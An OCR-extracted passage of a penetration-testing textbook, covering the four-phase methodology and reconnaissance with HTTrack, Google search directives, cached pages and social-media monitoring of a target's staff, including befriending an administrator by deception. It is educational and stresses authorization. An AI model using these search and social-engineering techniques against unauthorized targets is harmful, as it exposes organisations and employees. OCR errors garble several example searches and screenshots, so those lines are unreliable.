981simply open up Backtrack and deploy a VM as a target. Setting up a lab like this
982gives you the ability to quickly plug-and-play with various operating systems
983and configurations.
984
985Another benefit of using virtual machines in your pen testing lab is the fact
986that it is very simple to sandbox your entire system. Simply turn off the wire-
987less card and unplug the cable from the Internet. Your physical machine and
988virtual machines will still be able to communicate with each other and you can
989be certain that no attack traffic will leave your physical machine.
990
991In general, penetration testing is a destructive process. Many of the tools and
992exploits we run can cause damage or take systems offline. In some cases, it is
993easier to reinstall the OS or program rather than attempt to repair it. This is
994another area where VMs shine. Rather than having to physically reinstall a pro-
995gram like SQL server or even an entire operating system, the VM can be quickly
996reset or restored to its original configuration.
997
998PHASES OF A PENETRATION TEST
999
1000Like most things, the overall process of penetration testing can be broken
1001down into a series of steps or phases. When put together, these steps form a
1002comprehensive methodology for completing a penetration test. Careful review
1003of unclassified incident response reports or breech disclosures supports the
1004idea that most black hat hackers also follow a process when attacking a target.
1005The use of an organized approach is important because it not only keeps the
1006penetration tester focused and moving forward but also allows the results or
1007output from each step to be used in the ensuing steps.
1008
1009The use of a methodology allows you to break down a complex process into a
1010series of smaller more manageable tasks. Understanding and following a meth-
1011odology is an important step in mastering the basics of hacking. Depending
1012on the literature or class you are taking, this methodology usually contains
1013between four and seven steps or phases. Although the overall names or num-
1014ber of steps can vary between methodologies, the important thing is that
1015the process provides a complete overview of the penetration testing process.
1016
1017
1018
1019What Is Penetration Testing? CHAPTER 1
1020
1021
1022
1023For example, some methodologies use the term "Information Gathering,"
1024whereas others call the same process "Reconnaissance." For the purpose of this
1025book, we will focus on the activities of the phase rather than the name. After
1026you have mastered the basics, you can review the various penetration testing
1027methodologies and choose one that you like best.
1028
1029To keep things simple, we will use a four-step process to explore and learn
1030penetration testing. If you search around and examine other methodologies
1031(which is important to do), you may find processes that include more or less
1032steps than we are using as well as different names for each of the phases. It
1033is important to understand that although the specific terminology may differ,
1034most solid penetration testing methodologies cover the same topics.
1035
1036There is one exception to this rule: the final step in many hacking methodolo-
1037gies is a phase called "hiding," "covering your tracks," or "removing evidence."
1038Because this book focuses on understanding the basics, it will not be included
1039in this methodology. Once you have a solid understanding of the basics, you
1040can go on to explore and learn more about this phase.
1041
1042The remainder of this book will be dedicated to reviewing and teaching the fol-
1043lowing steps: Reconnaissance, Scanning, Exploitation, and Maintaining Access.
1044Sometimes, it helps to visualize these steps as an inverted triangle. Figure 1.3
1045demonstrates this approach. The reason we use an inverted triangle is because
1046the outcome of initial phases is very broad. As we move down into each phase,
1047we continue to drill down to very specific details.
1048
1049The inverted triangle works well because it represents our journey from the
1050broad to the specific. For example, as we work through the reconnaissance
1051phase, it is important to cast our nets as wide as possible. Every detail and every
1052piece of information about our target is collected and stored. The penetration
1053testing world is full of many great examples when a seemingly trivial piece of
1054
1055
1056
1057
1058FIGURE 1.3
1059
1060Zero Entry Hacking Penetration (ZEH) Testing Methodology.
1061
1062
1063
1064The Basics of Hacking and Penetration Testing
1065
1066
1067
1068information was collected in the initial phase and later turned out to be a cru-
1069cial component for successfully completing an exploit and gaining access to
1070the system. In later phases, we begin to drill down and focus on more specific
1071details of the target. Where is the target located? What is the IP address? What
1072operating system is the target running? What services and versions of software
1073are running on the system? As you can see, each of these questions becomes
1074increasingly more detailed and granular.
1075
1076It is also important to understand the order of each step. The order in which
1077we conduct the steps is very important because the result or output of one step
1078needs to be used in the step below it. You need to understand more than just
1079how to simply run the security tools in this book. Understanding the proper
1080sequence in which they are run is vital to performing a comprehensive and
1081realistic penetration test.
1082
1083For example, many newcomers skip the Reconnaissance phase and go straight
1084to exploiting their target. Not completing steps 1 and 2 will leave you with a
1085significantly smaller target list and attack vector on each target. In other words,
1086you become a one-trick-pony. Although knowing how to use a single tool
1087might be impressive to your friends and family, it is not to the security commu-
1088nity and professionals who take their job seriously.
1089
1090It may also be helpful for newcomers to think of the steps we will cover as a
1091circle. It is very rare to find critical systems exposed directly to the Internet in
1092today's world. In many cases, penetration testers must access and penetrate a
1093series of related targets before they have a path to reach the original target. In
1094these cases, each of the steps is often repeated. Figure 1.4 introduces the meth-
1095odology as a cyclical process.
1096
1097
1098
1099
1100FIGURE 1.4
1101
1102Cyclical Representation of the ZEH Methodology.
1103
1104
1105
1106What Is Penetration Testing? CHAPTER 1
1107
1108
1109
1110Zero Entry Hacking: A Four-Step Model
1111
1112Let us briefly review each of the four steps that will be covered so you have a
1113solid understanding of them. The first step in any penetration test is "recon-
1114naissance." This phase deals with information gathering about the target. As
1115was mentioned previously the more information you collect on your target,
1116the more likely you are to succeed in later steps. Reconnaissance will be dis-
1117cussed in detail in Chapter 2.
1118
1119Regardless of the information you had to begin with, after completing in-
1120depth reconnaissance you should have a list of target IP addresses that can be
1121scanned. The second step in our methodology can be broken out into two dis-
1122tinct activities. The first activity we conduct is port scanning. Once we have fin-
1123ished with port scanning, we will have a list of open ports and potential service
1124running on each of the targets. The second activity in the scanning phase is vul-
1125nerability scanning. Vulnerability scanning is the process of locating and iden-
1126tifying specific weaknesses in the software and services of our targets.
1127
1128With the results from step 2 in hand, we continue to the "exploitation" phase.
1129Once we know exactly what ports are open, what services are running on those
1130ports, and what vulnerabilities are associated with those services, we can begin
1131to attack our target. This is the phase that most newcomers associate with
1132"real" hacking. Exploitation can involve lots of different techniques, tools, and
1133code. We will review a few of the most common tools in Chapter 4. The ulti-
1134mate goal of exploitation is to have administrative access (complete control)
1135over the target machine.
1136
1137The final phase we will examine is "maintaining access." Oftentimes, the
1138payloads delivered in the exploitation phase provide us with only tempo-
1139rary access to the system. Because most payloads are not persistent, we need
1140to create a more permanent backdoor to the system. This process allows our
1141administrative access to survive program closures and even reboots. As an ethi-
1142cal hacker, we must be very careful about the use and implementation of this
1143phase. We will discuss how to complete this step as well as the ethical implica-
1144tions of using backdoor or remote control software.
1145
1146Although not included as a formal step in the penetration testing methodol-
1147ogy, the final (and arguably the most important) activity of every PT is the
1148report. Regardless of the amount of time and planning you put into conduct-
1149ing the penetration test, the client will often judge your work and effectiveness
1150on the basis of the quality of your report. The final PT report should include all
1151the relevant information uncovered in your test and explain in detail how the
1152test was conducted and what was done during the test. Whenever possible, mit-
1153igations and solutions should be presented for the security issues you uncov-
1154ered. Finally, an executive summary should be included in every FT report. The
1155purpose of this summary is to provide a simple one- to two-page, nontechni-
1156cal overview of your findings. This report should highlight and briefly sum-
1157marize the most critical issues your test uncovered. It is vital that this report
1158
1159
1160
1161The Basics of Hacking and Penetration Testing
1162
1163
1164
1165be readable (and comprehendible) by both technical and nontechnical person-
1166nel. It is important not to fill the executive summary with too many technical
1167details; that is the purpose of the detailed report.
1168
1169CHAPTER REVIEW
1170
1171This chapter introduced the concept of penetration testing and hacking as a
1172means of securing systems. It also discussed the various roles and charac-
1173ters that take part in the hacking scene. The chapter examined the basics of
1174Backtrack Linux including how to boot up, login, start X, get an IP address,
1175and shutdown. We talked about how to set up your own isolated PT lab so you
1176have a place to practice without fear of breaking the law and we wrapped up by
1177reviewing the steps of a penetration test.
1178
1179It should be noted that there are several alternatives to Backtrack. At some
1180point, you may want to review and explore these other distributions. Matriux
1181is similar to Backtrack but also includes a Windows binary directory that can be
1182used and accessed directly from a Windows machine. Fedora Security Spin is a
1183collection of security-related tools built off of the Fedora distribution. KATANA
1184is a multi-boot DVD that gathers a number of different tools and distributions
1185into a single location. Finally, you may want to explore the classic STD distri-
1186bution as well as Pentoo and Blackbuntu. There are many other Linux pen-
1187etration testing distributions — a simple Google search for "Linux Penetration
1188Testing Distributions" will provide you with a plethora of options. You could
1189also spend some time building and customizing your own Linux distribution
1190by collecting and installing tools as your hacking career progresses.
1191
1192SUMMARY
1193
1194This chapter introduced the concept of penetration testing and ethical hack-
1195ing. A special "basics only," four-step methodology including Reconnaissance,
1196Scanning, Exploitation, and Maintaining Access was presented and explained.
1197Information for setting up and using Backtrack Linux including configuring
1198a network connection and issuing commands in a terminal window was pre-
1199sented. The use and creation of a penetration testing lab was outlined. This will
1200allow you to practice your skills in a safe and sandboxed environment. It will
1201also allow for completing and following along with the examples detailed in this
1202book.
1203
1204
1205
1206
1207Information in This Chapter:
1208
1209â– HTTrack: Website Copier
1210
1211■Google Directives — Practicing Your Google-Fu
1212
1213â– The Harvester: Discovering and Leveraging E-mail Addresses
1214
1215â– Whois
1216
1217â– Netcraft
1218
1219â– Host
1220
1221â– Extracting Information from DNS
1222
1223â– Extracting Information from E-mail Servers
1224
1225â– MetaGooFil
1226
1227â– Social Engineering
1228
1229â– Sifting through the Intel to Finding Attackable Targets
1230
1231
1232
1233The Basics of Hacking and Penetration Testing
1234
1235
1236
1237INTRODUCTION
1238
1239In most cases people who attend hacking workshops or classes have a basic
1240understanding of a few security tools. Typically, these students have used a
1241port scanner to examine a system or maybe they have used Wireshark to exam-
1242ine network traffic. Some have even played around with exploit tools like
1243Metasploit. Unfortunately, most beginners do not understand how these tools
1244fit into the grand scheme of a penetration test. As a result, their knowledge is
1245incomplete. Following a methodology ensures that you have a plan and know
1246what to do next.
1247
1248To stress the importance of using and following a methodology, it is often ben-
1249eficial to describe a scenario that helps demonstrate both the importance of
1250this step and the value of following a complete methodology when conducting
1251a penetration test.
1252
1253Assume you are an ethical penetration tester working for a security
1254company. Your boss walks over to your office and hands you a piece of
1255paper. "I just got off the phone with the CEO of that company. He wants
1256my best employee to Pen Test his company - that's you. Our Legal
1257Department will be sending you an email confirming we have all of the
1258proper authorizations and insurance". You nod, accepting the job. He
1259leaves. You flip over the paper, a single word is written on the paper,
1260"Syngress." It's a company you've never heard of before, and no other
1261information is written on the paper.
1262
1263What now?
1264
1265The first step in every job is research. The more thoroughly you prepare for a
1266task, the more likely you are to succeed. The guys who created Backtrack Linux
1267are fond of quoting Abraham Lincoln who said, "If I had six hours to chop
1268down a tree, I'd spend the first four of them sharpening my axe. " This is a per-
1269fect introduction to both penetration testing and the reconnaissance phase.
1270
1271Reconnaissance, also known as information gathering, is arguably the most
1272important of the four phases we will discuss. The more time you spend col-
1273lecting information on your target, the more likely you are to be successful in
1274the later phases. Ironically, recon is also one of the most overlooked, underuti-
1275lized, and misunderstood steps in FT methodologies today.
1276
1277It is possible that this phase is overlooked because newcomers are never for-
1278mally introduced to the concept, its rewards, or how the results of good infor-
1279mation gathering can be vital in later steps. It is also possible that this phase is
1280overlooked because it is the least "technical." Oftentimes, people who are new
1281to hacking tend to view this phase as boring and unchallenging. Nothing could
1282be further from the truth.
1283
1284Although it is true that there are very few good, automated tools that can be
1285used to complete recon, once you understand the basics it is like an entirely
1286new way of looking at the world. A good information gatherer is made up of
1287equal parts: hacker, social engineer, and private investigator. Aside from the lack
1288
1289
1290
1291Reconnaissance CHAPTER 2
1292
1293
1294
1295of tools, the absence of well-defined rules of engagement also distinguishes this
1296phase from all others. This is in stark contrast to the remaining steps in our
1297methodology. For example, when we discuss scanning in Chapter 3, there is a
1298specific order and a clear series of steps that need to be followed in order to
1299properly port scan a target.
1300
1301Learning how to conduct digital reconnaissance is a valuable skill for anyone
1302living in today's world. For penetration testers and hackers, it is invaluable.
1303The penetration testing world is filled with great examples and stories of how
1304good recon single-handedly allowed the tester
1305or system.
1306
1307Consider the following example: assume we have two different criminals who
1308are planning to rob a bank. The first criminal buys a gun and runs into the
1309first bank he finds yelling "HANDS UP! GIVE ME ALL YOUR MONEY!" It is
1310not hard to imagine that the scene would be complete chaos and even if the
1311bungling burglar managed to get away, it probably would not take long for the
1312police to find him, arrest him, and send him to prison. Contrast this to nearly
1313every Hollywood movie in existence today where criminals spend months
1314planning, scheming, organizing, and reviewing details before the heist. They
1315spend time getting weapons anonymously, planning escape routes, and review-
1316ing schematics of the building. They visit the bank to determine the position of
1317the security cameras, make note of the guards, and determine when the bank
1318has the most money or is the most vulnerable. Clearly, the second criminal has
1319the better chance of getting away with the money.
1320
1321It should be obvious that the difference between these two examples is prepa-
1322ration and homework. Hacking and penetration testing is the same — you can-
1323not just get an IP address and start running Metasploit (well you can, but you
1324are probably not going to be very effective).
1325
1326Recall the example used to begin this chapter. You had been assigned to
1327complete a penetration test but were given very little information to go on.
1328As a matter of fact, you were given only the company name, one word. The
1329million-dollar question for every aspiring hacker is, "How do I go from a single
1330company name to owning the systems inside the network?" When we begin,
1331we know virtually nothing about the organization; we do not know their web-
1332site, physical address, or number of employees. We do not know their public
1333IP addresses or internal IP schemes; we know nothing about the technology
1334deployed, operating systems used, or defenses.
1335
1336Step 1 begins by conducting a thorough search of public information. The great
1337thing about this phase is that in most cases, we can gather a significant amount
1338of data without ever sending a single packet to the target. Although it should
1339be pointed out that some tools or techniques used in reconnaissance do in fact
1340send information directly to the target, it is important to know the difference
1341between which tools do and which tools do not touch the target. There are two
1342main goals in this phase: first, we need to gather as much information as pos-
1343sible about the target; second, we need to sort through all the information gath-
1344ered and create a list of attackable IP addresses.
1345
1346
1347
1348The Basics of Hacking and Penetration Testing
1349
1350
1351
1352In Chapter 1, it was pointed out that a major difference between black hat and
1353white hat attackers is authorization. Step 1 provides us with a prime example of
1354this. Both types of hackers conduct exhaustive reconnaissance on their targets.
1355Unfortunately, malicious hackers are bound by neither scope nor authorization.
1356
1357When ethical hackers conduct research, they are required to stay within
1358the confines of the test. During the information gathering process, it is not
1359unheard-of for a hacker to uncover a vulnerable system that is related to the tar-
1360get but not owned by the target. Even if the related target could provide access
1361into the original organization, without prior authorization, a white hat hacker
1362is not allowed to use or explore this option. For example, let us assume that
1363you are doing a penetration test against a company and you determine that
1364their web server (which contains customer records) is outsourced or managed
1365by a third party. If you find a serious vulnerability on the customer's website,
1366but you have not been explicitly authorized to test and use the website, you
1367must ignore it. The black hat attackers are bound by no such rules and will use
1368any means possible to access the target systems. In most cases, because you
1369were not authorized to test and examine these outside systems, you will not be
1370able to provide a lot of detail; however, your final report must include as much
1371information as possible about any systems that you believe put the organiza-
1372tion at risk.
1373
1374To be successful at reconnaissance, you must have a strategy. Nearly all facets
1375of information gathering leverage the power of the Internet. A typical strategy
1376needs to include both active and passive reconnaissance.
1377
1378Active reconnaissance includes interacting directly with the target. It is important
1379to note that during this process, the target may record our IP address and log
1380our activity.
1381
1382Passive reconnaissance makes use of the vast amount of information available
1383on the web. When we are conducting passive reconnaissance, we are not inter-
1384acting directly with the target and as such, the target has no way of knowing,
1385recording, or logging our activity.
1386
1387As mentioned, the goal of reconnaissance is to collect as much information as
1388possible on your target. At this point in the penetration test, no detail should
1389be overlooked regardless of how innocuous it may seem. While you are gath-
1390ering information, it is important to keep your data in a central location.
1391Whenever possible, it is helpful to keep the information in electronic format.
1392This allows for quick and accurate searches later on. Every hacker is a bit dif-
1393ferent and there are still several hackers who prefer to print out all the infor-
1394mation they gather. Each piece of paper is carefully cataloged and stored in a
1395folder. If you are going to use the traditional paper method, be sure to carefully
1396organize your records. Paper-based information gathering binders on a single
1397target can quickly grow to several hundred pages.
1398
1399In most cases, the first activity is to locate the target's website. In our example,
1400we would use a search engine to look for "Syngress. "
1401
1402
1403
1404Reconnaissance CHAPTER 2
1405
1406
1407
1408HTTrack: WEBSITE COPIER
1409
1410Typically, we begin step 1 by closely reviewing the target's website. In some
1411cases, we may actually use a tool called HTTrack to make a page-by-page copy
1412of the website. HTTrack is a free utility that creates an identical, off-line copy
1413of the target website. The copied website will include all the pages, links, pic-
1414tures, and code from the original website; however, it will reside on your local
1415
1416
1417
1418ADDITIONAL RESOURCES
1419
1420
1421
1422It is important to understand that the more time you spend navigating and exploring
1423the target website, the more likely it is that your activity can be tracked or traced
1424(even if you are simply browsing the site). Remember anytime you interact directly
1425with a resource owned by the target, there is a chance you will leave a digital
1426fingerprint behind.
1427
1428Advanced penetration testers can also run automated tools to extract additional or
1429hidden information from a local copy of a website.
1430
1431HTTrack can be downloaded directly from the company's website at: http://www.
1432httrack.com/. Installing for Windows is as simple as downloading the installer .exe
1433and clicking next. If you want to install HTTrack in Backtrack, you can connect to the
1434Internet as we described in Chapter 1, open a terminal, and type:
1435
1436
1437
1438apt-get install webhttrack
1439
1440Once the program is installed in, you can find it by clicking: Kstart
1441WebHTTrack Website Copier, as shown in Figure 2.1.
1442
1443
1444
1445Internet
1446
1447
1448
1449The "Kstart" is the small dragon icon in the lower left of the screen. This provides you
1450access to many of the tools included with Backtrack. The Kstart button is similar to
1451the Windows or Start button found in many Microsoft operating systems.
1452
1453
1454
1455
1456« Services
14572 Wine
1458\- Graphics
1459i I Multimedia
1460J System
1461,„ Utilities
1462
1463
1464
1465Actions
1466m settings
1467* System Menu
1468
1469Run Command..
1470
1471Lock Session
1472â– â– Logout...
1473
1474
1475
1476'« a « m
1477
1478
1479
1480C£ Browse Mirrored Websites
1481
1482* Kopete - instant Messenger
1483
1484* ^ Lrferea. Feed Reacfer
1485
1486g£ WebHTTrack Websfte Copier^)
1487^V""- Hf rWlirti Mifflilff — ^
1488
1489* f ettercap - Ettercap
1490
1491gFTP
1492â– tpeat
1493
1494* Q Wiresharfc - Network Analyzer
149511 Sun Java £ Web Start
1496
1497*J Konqueror - Web Browser
1498
1499Lynx Web Browser
1500** XChat IRC
1501
1502H Firefox Web Browser
1503
1504w i •- ft " —
1505
1506
1507
1508FIGURE 2.1
1509
1510Accessing the Newly Installed HTTrack.
1511
1512
1513
1514The Basics of Hacking and Penetration Testing
1515
1516
1517
1518computer. Utilizing a website copying tool like HTTrack allows us to explore
1519and thoroughly mine the website "off-line" without having to spend additional
1520time traipsing around on the company's web server.
1521
1522After we have installed the program, we need to run it against our target. Please
1523be aware that this activity is easy to trace and considered highly offensive. Never
1524run this tool without prior authorization. Once HTTrack is started, we are pre-
1525sented with a number of web pages that allow us to set up and customize the
1526copy process. Each page allows us to change various aspects of the program
1527including language (English is default), project name, the location where we
1528will store the copied website, and the web address of the site you would like
1529to copy. You can work your way through each of these pages by making the
1530desired changes to each option and clicking the "Next" button. The final page
1531will include a "Start" button, click this when you are ready to begin making a
1532copy of your target's website. The amount of time it takes for this process to
1533complete will depend on the size of your target's website. Once HTTrack has
1534finished copying the target website, it will present you with a webpage allow-
1535ing you to "Browse the Mirrored Website" in a browser or navigate to the path
1536where the site was stored.
1537
1538Whether you make a copy of the target website or you simply browse the tar-
1539get in real time, it is important to pay attention to details. You should begin
1540by closely reviewing and recording all the information you find on the target's
1541website. Oftentimes, with very little digging you will be able to make some sig-
1542nificant findings including physical address and locations, phone numbers,
1543e-mail addresses, hours of operation, business relationships (partnerships),
1544employee names, social media connections, and other public tidbits.
1545
1546Oftentimes when conducting a penetration test, it is important to pay spe-
1547cial attention to things like "News" or "Announcements." Companies are
1548often proud of their achievements and unintentionally leak useful informa-
1549tion through these stories. Company mergers and acquisitions can also yield
1550valuable data; this is especially important for expanding the scope and adding
1551additional targets to our penetration test. Even the smoothest of acquisitions
1552creates change and disarray in an organization. There is always a transition
1553period when companies merge. This transition period provides us with unique
1554opportunities to take advantage of the change and confusion. Even if merger
1555is old news or goes off without a hitch, the information still provides value by
1556giving us additional targets. Merged or sibling companies should be authorized
1557and included in the original target list, as they provide a potential gateway into
1558the organization.
1559
1560Finally, it is important to search and review any open job postings for the tar-
1561get company. Job postings often reveal very detailed information about the
1562technology being used by an organization. Many times you will find specific
1563hardware and software listed on the job opening. Do not forget to search for
1564your target in the nationwide job banks as well. For example, assume you
1565come across a job requisition looking for a Network Administrator with Cisco
1566
1567
1568
1569Reconnaissance CHAPTER 2
1570
1571
1572
1573ASA experience. From this post, you can draw some immediate conclusions
1574and make some educated guesses. First, you can be certain that the company
1575either uses, or is about to use, a Cisco ASA firewall. Second, depending on the
1576size of the organization, you may be able to infer that the company does not
1577have, or is about to lose, someone with knowledge of how to properly use and
1578configure a Cisco ASA firewall. In either case, you have gained valuable knowl-
1579edge about the technology in place.
1580
1581In most cases, once we have thoroughly examined the target's website, we
1582should have a solid understanding of the target including who they are, what
1583they do, and where they are located.
1584
1585Armed with this basic information about the target, we move into passive
1586reconnaissance. It is very difficult, if not impossible, for a company to deter-
1587mine when a hacker or penetration tester is conducting passive reconnaissance.
1588This activity offers a low-risk, high-reward situation for attackers. Recall that
1589passive reconnaissance is conducted without ever sending a single packet to
1590the target systems. Our weapon of choice to perform this task is the Internet.
1591We begin by performing exhaustive searches of our target in the various search
1592engines available.
1593
1594Although there are many great search engines available today, when covering
1595the basics of hacking and penetration testing, we will focus on Google. Google
1596is very, very good at its job. There is a reason why the company's stock trades
1597for $400- $600 a share. Spiders from the company aggressively and repeatedly
1598scour all corners of the Internet cataloging information and send it back to the
1599Google. The company is so efficient at its job, that oftentimes hackers can per-
1600form an entire penetration test using nothing but Google.
1601
1602At Defcon 13 Johnny Long rocked the hacker community by giving a talk titled
1603"Google Hacking for Penetration Testers." This talk was followed up by a book
1604that dove even deeper into the art of Google Hacking.
1605
1606Although we would not dive into the specifics of Google Hacking, a solid
1607understanding of how to properly use Google is vital to becoming a skilled
1608penetration tester. If you ask people, "How do you use Google?" they typically
1609respond by saying, "Well it's simple... You fire up a web browser, navigate to
1610Google, and type what you're searching for in the box."
1611
1612
1613
1614ADDITIONAL RESOURCES
1615
1616
1617
1618If you are interested in penetration testing, it is highly suggested that you watch the
1619video and buy the book. You can see the video for free online (check the Defcon
1620media archive), and the book is published by Syngress and available nearly anywhere.
1621Johnny's discoveries have changed penetration testing and security forever. Johnny's
1622material is awesome and well worth your time.
1623
1624
1625
1626The Basics of Hacking and Penetration Testing
1627
1628
1629
1630Although this answer is fine for 99 percent of the planet, it is not good enough
1631for aspiring hackers. You have to learn to search in a smarter way and maxi-
1632mize the return results. In short, you must cultivate your Google-Fu. Learning
1633how to properly use a search engine like Google will save you time and allow
1634you to find the hidden gems that are buried in the trillions of web pages on the
1635Internet today.
1636
1637GOOGLE DIRECTIVES— PRACTICING YOUR
1638GOOGLE-FU
1639
1640Luckily for us, Google provides "directives" that are easy to use and help us get
1641the most out of every search. These directives are keywords that enable us to
1642more accurately extract information from the Google Index.
1643
1644Consider the following example: assume you are looking for information on
1645the Dakota State University website (dsu.edu) about me. The simplest way to
1646perform this search is to enter the following terms (without the quotes) in a
1647Google search box: "pat engebretson dsu." This search will yield a fair number
1648of hits. However of the first 50 websites returned, only four were pulled directly
1649from the DSU website.
1650
1651By utilizing Google directives, we can force the Google Index to do our bid-
1652ding. In the example above we know both the target website and the keywords
1653we want to search. More specifically, we are interested in forcing Google to
1654return only results that are pulled directly from the target (dsu.edu) domain. In
1655this case, our best choice is to utilize the "site:" directive. Using the "site:" direc-
1656tive forces Google to return only hits that contain the keywords we used and
1657come directly from the specified website.
1658
1659To properly use a Google directive, you need three things:
1660
16611. The name of the directive you want to use
1662
16632. A colon
1664
16653. The term you want to use in the directive
1666
1667After you have entered the three pieces of information above, you can search
1668as you normally would. To utilize the "site:" directive, we need to enter the fol-
1669lowing into a Google search box:
1670
1671site: domain term(s) to search
1672
1673Note that there is no space between the directive, colon, and domain. In our
1674earlier example we wanted to conduct a search for Pat Engebretson on the DSU
1675website. To accomplish this, we would enter the following command into the
1676Google search bar:
1677
1678site:dsu.edii pat engebretson
1679
1680Running this search provides us with drastically different results than our ini-
1681tial attempt. First, we have trimmed the overall number of hits from 600 +
1682
1683
1684
1685Reconnaissance CHAPTER 2
1686
1687
1688
1689ALERT!
1690
1691
1692
1693It is worth noting that all searches in Google are case insensitive so "pat,'
1694"PAT" will all return the same results!
1695
1696
1697
1698"Pat," and
1699
1700
1701
1702to about 50. There is little doubt that a person can sort through and gather
1703information from 50 hits much quicker than 600. Second and possibly more
1704importantly, every single returned result comes directly from the target website.
1705Utilizing the "site:" directive is a great way to search a specific target and look
1706for additional information. This directive allows you to avoid search overload
1707and to focus your search.
1708
1709Another good Google directive to use is "intitle:" or "allintitle:". Adding either
1710of these to your search causes only websites that have your search words in the
1711title of the webpage to be returned. The difference between "intitle:" and "allin-
1712title:" is straightforward, "allintitle:" will only return websites that contain all
1713the keywords in the web page title. The "intitle:" directive will return any page
1714whose title contains at least one of the keywords you entered.
1715
1716A classic example of putting the "allintitle:" Google hack to work is to perform
1717the following search:
1718
1719alii nti tl e : i ndex of
1720
1721Performing this search will allow us to view a list of any directories that have
1722been indexed and are available via the web server. This is often a great place to
1723gather reconnaissance on your target.
1724
1725If we want to search for sites that contain specific words in the URL, we can
1726use the "inurl:" directive. For example, we can issue the following command to
1727locate potentially interesting pages on our target's web page:
1728
1729inurl : admi n
1730
1731This search can be extremely useful in revealing administrative or configuration
1732pages on your target's website.
1733
1734It can also be very valuable to search the Google cache rather than the target's
1735website. This process not only reduces your digital footprints on the target's
1736server, making it harder to catch you, it also provides a hacker with the occa-
1737sional opportunity to view web pages and files that have been removed from
1738the original website. The Google cache contains a stripped-down copy of each
1739website that the Google bots have spidered. It is important to understand that
1740the cache contains both the code used to build the site and many of the files
1741that were discovered during the spidering process. These files can be PDFs, MS
1742Office documents like Word and Excel, text files, and more.
1743
1744It is not uncommon today for information to be placed on the Internet
1745by mistake. Consider the following example. Suppose you are a network
1746
1747
1748
1749The Basics of Hacking and Penetration Testing
1750
1751
1752
1753administrator for a company. You use MS Excel to create a simple workbook
1754containing all the IP addresses, computer names, and locations of the PCs in
1755your network. Rather than carrying this Excel spreadsheet around, you decide
1756to publish it to the intranet where it will be accessible only by people within
1757your organization. However, rather than publishing this document to the
1758intranet website, you mistakenly publish it to the company Internet website.
1759If the Google bots spider your site before you take this file down, it is possible
1760the document will live on in the Google cache even after you have removed it
1761from your site. As a result, it is important to search the Google cache too.
1762
1763We can use the cache: directive to limit our search results and show only infor-
1764mation pulled directly from the Google cache. The following search will pro-
1765vide us with the cached version of the Syngress homepage:
1766
1767cache : syngress . com
1768
1769It is important that you understand that clicking on any of the URLs will bring
1770you to the live website, not the cached version. If you want to view specific
1771cached pages, you will need to modify your search.
1772
1773The last directive we will cover here is "filetype:". We can utilize "filetype:" to
1774search for specific file extensions. This is extremely useful for finding specific
1775types of files on your target's website. For example, to return only hits that con-
1776tain PDF documents, you would issue the following command:
1777
1778111 etype : pdf
1779
1780This powerful directive is a great way to find links to specific files like .doc, xlsx,
1781ppt, txt, and many more. Your options are nearly limitless.
1782
1783For additional power, we can combine multiple directives into the same search.
1784For example, if we want to find all the PowerPoint presentations on the DSU
1785website, you would enter the following command into the search box:
1786
1787site:dsu.edu flletyperppt
1788
1789In this case, every result that is returned is a PPT file and comes directly from
1790the dsu.edu domain! Figure 2.2 shows a screenshot of two searches: the first
1791
1792
1793
1794Web lm&g££ Videos lfl$ff$ Ne*s Shopping Gmaif more t
1795
1796
1797
1798
1799Web Images Videos Matw News Shopping ftmail more t
1800
1801
1802
1803
1804FIGURE 2.2
1805
1806The Power of Google Directives.
1807
1808
1809
1810Reconnaissance CHAPTER 2
1811
1812
1813
1814utilizes Google directives and the second shows the results from a traditional
1815search. Utilizing Google directives has drastically reduced the number of hits
1816(by 33,364!).
1817
1818There are many other types of directives and Google hacks that you should
1819become familiar with. Along with Google, it is important that you become
1820efficient with several other search engines as well. Oftentimes, different search
1821engines will provide different results, even when you search for the same key-
1822words. As a penetration tester conducting reconnaissance, you want to be as
1823thorough as possible.
1824
1825As a final warning, it should be pointed out that these passive searches are only
1826passive as long as you are searching. Once you make a connection with the
1827target system (by clicking on any of the links), you are back to active mode. Be
1828aware that active reconnaissance without prior authorization is likely an illegal
1829activity.
1830
1831Once you have thoroughly reviewed the target's web page and conducted
1832exhaustive searches utilizing Google and other search engines, it is important to
1833explore other corners of the Internet. Newsgroups and Bulletin Board Systems
1834like UseNet and Google Groups can be very useful for gathering information
1835about a target. It is not uncommon for people to use these discussion boards
1836to post and receive help with technical issues. Unfortunately (or fortunately,
1837depending on which side of the coin you are looking at), employees often
1838post very detailed questions including sensitive and confidential information.
1839For example, consider a network administrator who is having trouble getting
1840his firewall properly configured. It is not uncommon to witness discussions
1841on public forums where these admins will post entire sections of their config
1842files. To make matters worse, many people post using their company e-mail
1843addresses. This information is a virtual gold mine for an attacker.
1844
1845Even if our network admin is smart enough not to post detailed configuration
1846files, it is hard to get support from the community without inadvertently leak-
1847ing some information. Reading even carefully scrubbed posts will often reveal
1848specific software version, hardware models, current configuration information,
1849and the like about internal systems. All this information should be filed away
1850for future use.
1851
1852Public forums are an excellent way to share information and receive technical
1853help. However, when using these resources, be careful to use a slightly more
1854anonymous e-mail address like Gmail or Hotmail, rather than your corporate
1855address.
1856
1857The explosive growth in social media like Facebook, MySpace, and Twitter pro-
1858vides us with new avenues to mine data about our targets. When performing
1859reconnaissance, it is a good idea to use these sites to our advantage. Consider
1860the following fictitious example: You are conducting a penetration test against
1861a small company. Your reconnaissance has led you to discover that the network
1862administrator for the company has a Twitter and Facebook account. Utilizing a
1863
1864
1865
1866The Basics of Hacking and Penetration Testing
1867
1868
1869
1870little social engineering you befriend the unsuspecting admin and follow him
1871on both Facebook and Twitter. After a few weeks of boring posts, you strike the
1872jackpot. He makes a post on Facebook that says "Great. Firewalled died with-
1873out warning today. New one being sent over-night. Looks like I'll be pulling an
1874all-nighter tomorrow to get things back to normal."
1875
1876Another example would be a PC tech who posts, "Problem with latest
1877Microsoft patch, had to uninstall. Will call MS in the morning."
1878
1879Or even the following, "Just finished the annual budget process. Looks like I'm
1880stuck with that Server 2000 for another year."
1881
1882Although these examples may seem a bit over the top, you will be surprised
1883at the amount of information you can collect by simply monitoring what
1884employees post online.
1885
1886THE HARVESTER: DISCOVERING AND
1887LEVERAGING E-MAIL ADDRESSES
1888
1889An excellent tool to use in reconnaissance is The Harvester. The Harvester is
1890a simple but highly effective Python script written by Christian Martorella at
1891Edge Security. This tool allows us to quickly and accurately catalog both e-mail
1892addresses and subdomains that are directly related to our target.
1893
1894It is important to always use the latest version of the Harvester as many search
1895engines regularly update and change their systems. Even subtle changes to a
1896search engine's behavior can render automated tools ineffective. In some cases,
1897search engines will actually filter the results before returning information to
